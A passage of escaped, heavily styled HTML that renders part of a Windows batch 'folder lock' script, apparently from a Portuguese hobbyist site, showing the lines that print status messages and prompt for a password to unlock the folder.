0px !important; padding-left: 0px !important; padding-right: 0.3em !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; width: 3em !important;"&gt;19.&lt;/code&gt;&lt;span class="content" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: rgb(255, 255, 255) !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-color: rgb(108, 226, 108) !important; border-left-style: solid !important; border-left-width: 3px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 3.3em !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;span class="block" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: url(http://www.tudosobrehacker.com/plugins/content/codecitation/styles/wrapping.png) !important; background-position: 0px 1.1em !important; background-repeat: no-repeat !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 7px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 1.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; text-indent: -1.5em !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="plain" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: inline !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;echo Folder locked&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="line alt2" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="number" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(92, 92, 92) !important; display: block !important; float: left !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0.3em !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; width: 3em !important;"&gt;20.&lt;/code&gt;&lt;span class="content" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: rgb(248, 248, 248) !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-color: rgb(108, 226, 108) !important; border-left-style: solid !important; border-left-width: 3px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 3.3em !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;span class="block" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: url(http://www.tudosobrehacker.com/plugins/content/codecitation/styles/wrapping.png) !important; background-position: 0px 1.1em !important; background-repeat: no-repeat !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 7px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 1.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; text-indent: -1.5em !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="plain" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: inline !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;goto End&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="line alt1" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="number" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(92, 92, 92) !important; display: block !important; float: left !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0.3em !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; width: 3em !important;"&gt;21.&lt;/code&gt;&lt;span class="content" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: rgb(255, 255, 255) !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-color: rgb(108, 226, 108) !important; border-left-style: solid !important; border-left-width: 3px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 3.3em !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;span class="block" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: url(http://www.tudosobrehacker.com/plugins/content/codecitation/styles/wrapping.png) !important; background-position: 0px 1.1em !important; background-repeat: no-repeat !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 7px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 1.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; text-indent: -1.5em !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="plain" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: inline !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;:UNLOCK&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="line alt2" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="number" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(92, 92, 92) !important; display: block !important; float: left !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0.3em !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; width: 3em !important;"&gt;22.&lt;/code&gt;&lt;span class="content" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: rgb(248, 248, 248) !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-color: rgb(108, 226, 108) !important; border-left-style: solid !important; border-left-width: 3px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 3.3em !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;span class="block" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: url(http://www.tudosobrehacker.com/plugins/content/codecitation/styles/wrapping.png) !important; background-position: 0px 1.1em !important; background-repeat: no-repeat !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 7px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 1.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; text-indent: -1.5em !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="plain" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: inline !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;echo Enter password to unlock folder&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="line alt1" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="number" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(92, 92, 92) !important; display: block !important; float: left !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0.3em !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; width: 3em !important;"&gt;23.&lt;/code&gt;&lt;span class="content" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: rgb(255, 255, 255) !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-color: rgb(108, 226, 108) !important; border-left-style: solid !important; border-left-width: 3px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 3.3em !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;span class="block" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: url(http://www.tudosobrehacker.com/plugins/content/codecitation/styles/wrapping.png) !important; background-position: 0px 1.1em !important; background-repeat: no-repeat !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 7px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 1.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; text-indent: -1.5em !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="plain" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: inline !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;set/p "pass=&amp;gt;"&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="line alt2" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="number" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(92, 92, 92) !important; display: block !important; float: left !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0.3em !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; width: 3em !important;"&gt;24.&lt;/code&gt;&lt;span class="content" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: rgb(248, 248, 248) !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-color: rgb(108, 226, 108) !important; border-left-style: solid !important; border-left-width: 3px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 3.3em !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;span class="block" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: url(http://www.tudosobrehacker.com/plugins/content/codecitation/styles/wrapping.png) !important; background-position: 0px 1.1em !important; background-repeat: no-repeat !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 7px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 1.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; text-indent: -1.5em !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="plain" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: inline !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;if NOT %pass%== &amp;lt;strong&amp;gt;senha aqui&amp;lt;/strong&amp;gt; goto FAIL&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="line alt1" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="number" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(92, 92, 92) !important; display: block !important; float: left !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto 